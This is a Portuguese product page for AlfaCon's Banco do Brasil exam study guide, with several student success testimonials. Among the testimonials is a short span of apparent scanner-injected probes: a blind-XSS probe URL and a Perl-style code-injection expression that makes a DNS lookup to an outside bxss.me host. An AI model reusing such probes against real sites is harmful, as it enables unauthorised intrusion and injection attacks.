Material de acordo com edital publicado no dia 23/12/2022
CONTEÚDOS CONTEMPLADOS
• Língua Portuguesa
• Redação
• Língua Inglesa
• Matemática
• Atualidades do Mercado Financeiro
• Matemática Financeira
• Conhecimentos Bancários
• Conhecimentos de Informática
• Vendas e Negociação
ON-LINE
● Conhecimentos Bancários
● Conhecimentos de Informática
O AlfaCon preparou todo o material com explicações, reunindo os principais conteúdos relacionados a prova, dando ênfase aos tópicos mais cobrados. ESTEJA ATENTO AO CONTEÚDO ONLINE POR MEIO DO CÓDIGO DE RESGATE, para que você tenha acesso a mais conteúdo.
Equipe AlfaCon
| Título | Ano | Páginas | Formato | ISBN |
|---|---|---|---|---|
| Apostila BB - Escriturário/Agente Comercial - 4ª Edição | 12/2022 | 440 | 20.5 x 27.5 (cm) | 9786559185955 |
Meu nome é Paulo Lima Leal Junior, moro em Araras-SP e tenho 34 anos. Não tenho nível superior completo, ma...
Meu nome é Paulo Lima Leal Junior, moro em Araras-SP e tenho 34 anos. Não tenho nível superior completo, mas estou cursando o 3° ano de direito. Decidi estudar para concurso público pois quero mudança de vida.
Minha vida de concurseiro começou com um vídeo do Evandro Guedes no YouTube, esse cara é uma inspiração para mim. Estudo há dois anos e sou excedente no INSS, e agora aprovado no TRE. Minha rotina de estudos era 6 horas por dia, com foco maior em português e específicas, conciliando com trabalho. Minha jornada de trabalho inicia às 6:00 da manhã e chego às 15:00 em casa. Estudava até às 19:00 e ia para a faculdade, chegava às 23:00 e respondia questões até dormir.
Estudei pelo AlfaCon YouTube e revisão de questões. Agradeço muito a Deus, ao Thállius, Evandro e toda equipe AlfaCon nessa caminhada. Sempre estive muito motivado. Como diz o Evandro "não estude para passar, estude ATÉ passar”. É preciso abrir mão de muitas coisas para poder alcançar seus objetivos, incluindo as festinhas, mas o futebol aos domingos eu não abri mão. Porém, todo o esforço foi recompensado.
Sou casado, e tenho 3 filhos. Alguns amigos se afastam, não tem jeito, até porque você acaba se tornando o cara mais chato do mundo, não tem outro assunto além de concurso, e eu alugava os ouvidos dos meus amigos para explicar a matéria, e obviamente, eles não faziam ideia do que eu estava falando.
Tentei outros concursos, porém, fui reprovado no DEPEN 2015. Fiquei excedente no INSS 2016, e agora fui aprovado no TRE 2016/17. Comecei a estudar sem o edital estar aberto. A motivação é colocar a remuneração, o carro e a casa que você quer, atrás dá tela do seu notebook.
Conheci a AlfaCon através do YouTube. A AlfaCon foi essencial para a minha aprovação, pois a motivação é total e o material é ótimo. Algumas de minhas técnicas para aprender a matéria foram as musiquinhas de provimento, mnemônicos, ler e reler.
As maiores dificuldades foi conciliar o trabalho, a faculdade, os estudos para o concurso e os filhos. Mas minha maior motivação era falar para os meus filhos todos os dias antes deles acordarem “eles dependem de mim”.
Quando o concurso se aproximou fiquei muito nervoso, não dormia, não comia e vomitava bastante. No último mês eu potencializei as questões e deu certo. Acredito que responder questões da banca ajudou bastante na minha preparação. Revisar para não esquecer. Entretanto, redação me prejudicou um pouco, mas é lição.
Eu Eliene, Vi o anúcio do curso e fiz online !!!
bxss.me/t/xss.html?%00
".gethostbyname(lc("hitan"."pongpfftc4ed5.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(72).chr(114)....
Meu nome é Verônica, tenho 20 anos, moro em Taboão da Serra-SP e fui aprovada no concurso de auxiliar de pr...
Meu nome é Leandro Pires de Araujo, tenho 20 anos, sou do Rio de Janeiro – RJ e fui aprovado e 26º lugar no...
Meu nome é Leandro Pires de Araujo, tenho 20 anos, sou do Rio de Janeiro – RJ e fui aprovado e 26º lugar no cargo de Agente da PC SC. Curso Direito na UFRJ e comecei a estudar para concurso público por causa do meu sonho em seguir carreiras policiais. Estudo com regularidade há cerca de 1 ano, mais especificamente para essa prova desde a abertura do edital. Minha rotina de estudos era diária tanto de estudo dirigido quanto à complementação das videoaulas referentes às matérias que ainda não tinham sido vistas no curso do Sou+ Regular e que seriam cobradas no edital.
Minha maior dedicação e dificuldade também foi na disciplina de informática, que sempre tive maiores problemas para absorver a informação e conseguir reproduzir nos exercícios. Em relação à divisão entre básicas e específicas, dedicava igualmente, mas eu já possuía uma base considerável em português e RLM. Estudo, trabalho (maior parte do tempo de casa) e curso direito na UFRJ.
Confesso que minha faculdade está totalmente em segundo plano desde que comecei a estudar com o AlfaCon, pois me sinto muito mais motivado a aprender cada vez mais com as aulas online e o material didático do que com livros de doutrina intermináveis e prolixos. Já ouvi diversas vezes questionamentos de como consigo manter um alto rendimento na faculdade, embora não vá às aulas com frequência e não me dedique como os bons alunos de uma maneira geral, mas a resposta é simples: as aulas do Alfa são realmente muito completas e aptas a te ensinar de uma forma objetiva, rápida e eficiente, o que, infelizmente, no mundo acadêmico, está muito longe de ser realidade.
Estudei com o Sou+ Carreiras Policiais. Com toda certeza o material perfeito para toda a preparação. O meu objetivo principal nessa prova foi adquirir experiência de concurso para carreiras policiais, além de ter a oportunidade de vivenciar as demais fases do concurso. Nesse sentido, não tive muito problema com motivação, mas confesso que o resultado foi uma surpresa e foi bastante importante para que eu ganhasse mais confiança para as provas seguintes.
Não há dúvidas que a dedicação para concurso exija abrir mão de algumas várias coisas de sua vida particular. Foram vários finais de semana em casa, madrugadas com cadernos, resumos, mapas mentais na mão. Acredito que não tenha outra solução para o sucesso. Minha mãe sempre me deu muita força para eu estudar, embora não esteja muito confortável com o fato de eu ter escolhido as carreiras policiais como objetivo de vida. Em relação à minha namorada, foi tranquilo também. Sempre esteve disposta a abrir mão de saídas e momentos de lazer juntos para que eu pudesse me preparar.
Felizmente, esse não deve ter sido a maior dificuldade da minha preparação. As poucas pessoas que escolho ter ao meu redor acabam me apoiando por me entenderem. Fiz a prova de técnico judiciário para o TRF 2 região, na qual obtive aprovação, mas como foi apenas para cadastro de reserva, ainda não fui chamado.
Conheci o AlfaCon através de vídeos no YouTube. Sou aluno exclusivo do AlfaCon e dedico todo o conhecimento adquirido a essa sensacional equipe de professores e a todo o material exemplar disponibilizado. Basicamente, meu método de estudo era o ciclo de videoaula, resumo no caderno e exercícios. Em seguida, eram revisões infinitas do material anotado em cadernos e complementados com as informações de questões comentadas.
Minha memória é bastante fotográfica, então a disposição em três cores a partir de esquemas, mapas mentais, sempre foi bastante útil a mim. Além disso, tenho o hábito de estudar falando alto, como se estivesse dando uma espécie de aula. Acredito que isso facilite que eu saiba se estou ou não fluente na matéria e no conteúdo específico.
O mais difícil foi permanecer estudando nos dias em que estava mais cansado e desestimulado a continuar. Mas com disciplina superei todas as dificuldades, com toda certeza. Acredito que essa seja uma das minhas melhores qualidades. Eu dou um jeito de estudar e cumprir minhas metas diárias, independente do que aconteça ao longo do dia. Confesso que não tenho muito horários pré-determinados, mas, no final das contas, acabo cumprindo tudo.
Quanto mais perto da prova, mais eu estudo, sobretudo minhas anotações. Acho que relaxar perto do concurso me faz ficar cada vez mais nervoso e inseguro achando que falta aprender ou lembrar de alguma coisa. Prefiro ter a consciência limpa que estudei até o fiscal da prova mandar guardar tudo no dia da prova!
Sempre há falhas. Acredito que só consiga as perceber nos próximos concursos. Porém, acho que de uma maneira geral, meu resultado foi satisfatório dado o tempo de estudo, dedicação e experiência pequena em outros concursos.
Não desista dos seus sonhos. Simplesmente faça o que você estipulou que deve ser feito, independente da sua ansiedade, insegurança e questionamentos se tudo isso vale realmente a pena. Acredito que a disciplina, aliada à motivação, seja a alma da preparação. Não questione muito, simplesmente faça e confie no trabalho do AlfaCon, como eu confiei, que, no final, de um jeito ou de outro, a gente chega lá. Vá e vença!
Sou Fernando tenho 27 anos, sou natural de Belo Horizonte, moro em Contagem-MG com meus pais e com meu irmã...
Sou Fernando tenho 27 anos, sou natural de Belo Horizonte, moro em Contagem-MG com meus pais e com meu irmão. Sou formado em Turismo e estava trabalhando na área até Junho de 2016 quando fui mandado embora devido a crise que atingiu forte principalmente a hotelaria. Em meados de Setembro/2016, me vi em uma situação de angústia, totalmente sem rumo, com isso pedi muito a Deus que me desse um sinal pra qual caminho seguir, passaram-se algumas semanas e o sinal veio através de amigo (porém ainda não havia percebido, demorei pra perceber mas percebi), ao contar minha situação pra ele, o mesmo me disse em estudar pra concurso público e comentou sobre o concurso da PM - MG que seria uma boa e tal! Ele me indicou dois vídeos pra assistir, o primeiro de um professor de Filosofia e um outro do Evandro Guedes, foi um tampa na cara hahaha, a partir daí, comecei a procurar pelos cursos do AlfaCon e estudar pelas aulas Free e nunca mais parei.
Desempregado, sem dinheiro, com as contas que não param de chegar, inclusive pagando um apto junto com a namorada, ainda bem que ela trabalha, mas mesmo assim esta muito apertado. Em meio a essas dificuldades, pedi para os meus pais e para meu irmão para que me ajudassem a pagar a curso pra PM - MG do AlfaCon, porém os mesmos também se encontravam em uma situação delicada, até que veio a promoção de Natal onde minha mãe me ajudou a adquirir este curso, já tinha comprado a apostila com o único dinheiro que tinha, agora estava com os materiais completos, comecei a estudar forte pois faltava dois meses para a prova.
Enfim, passei na prova objetiva com 67,50 pts e recentemente passei na redação com 89 pts, agora estou aguardando a convocação pra a 2° fase, porém continuo os estudos para a próxima prova da PM - MG só que para o Interior que será em maio e aproveitar também porque o meu curso expira no dia 22 de Junho/2017.
Assim que fizer esta última prova da PM - MG Interior, irei dar continuidade mesmo com as aulas/cursos Free passando o foco para os grandes PF e PRF porque "pensar pequeno e pensar grande dá o mesmo trabalho", enquanto não consigo um emprego que me dê condições de investir em um curso, eu sempre participo das promoções como pro exemplo este último que o Prof Che lançou: "Porque eu mereço ganhar o 5000 Questões ou o Curso Anual?" quem sabe né?!
Muito obrigado Família AlfaCon, sem vocês não teria conquistado esta vitória e espero que não seja a única!
E como forma de gratidão, tento trazer pessoas pra estudar pelo AlfaCon como por exemplo minha namorada, meu irmão e amigos.
Contem comigo para o que precisarem!
Sucesso a todos!
Estudo pra concursos há quase 3 anos, mas sou aluno do Alfacon há 1 ano. Graças ao alfa eu consegui minha p...
Estudo pra concursos há quase 3 anos, mas sou aluno do Alfacon há 1 ano. Graças ao alfa eu consegui minha primeira aprovação em concurso e agora estou rumo as outras fases. Abdiquei-me de muitas coisas e inclusive do meu sonho a longo prazo para alcançar minha aprovação, para que eu tivesse condições de trabalhar no meu longo prazo. Foi doído e foi chorado mas valeu a pena o esforço e o meu nome no diário oficial. Continuem estudando, alfartanos!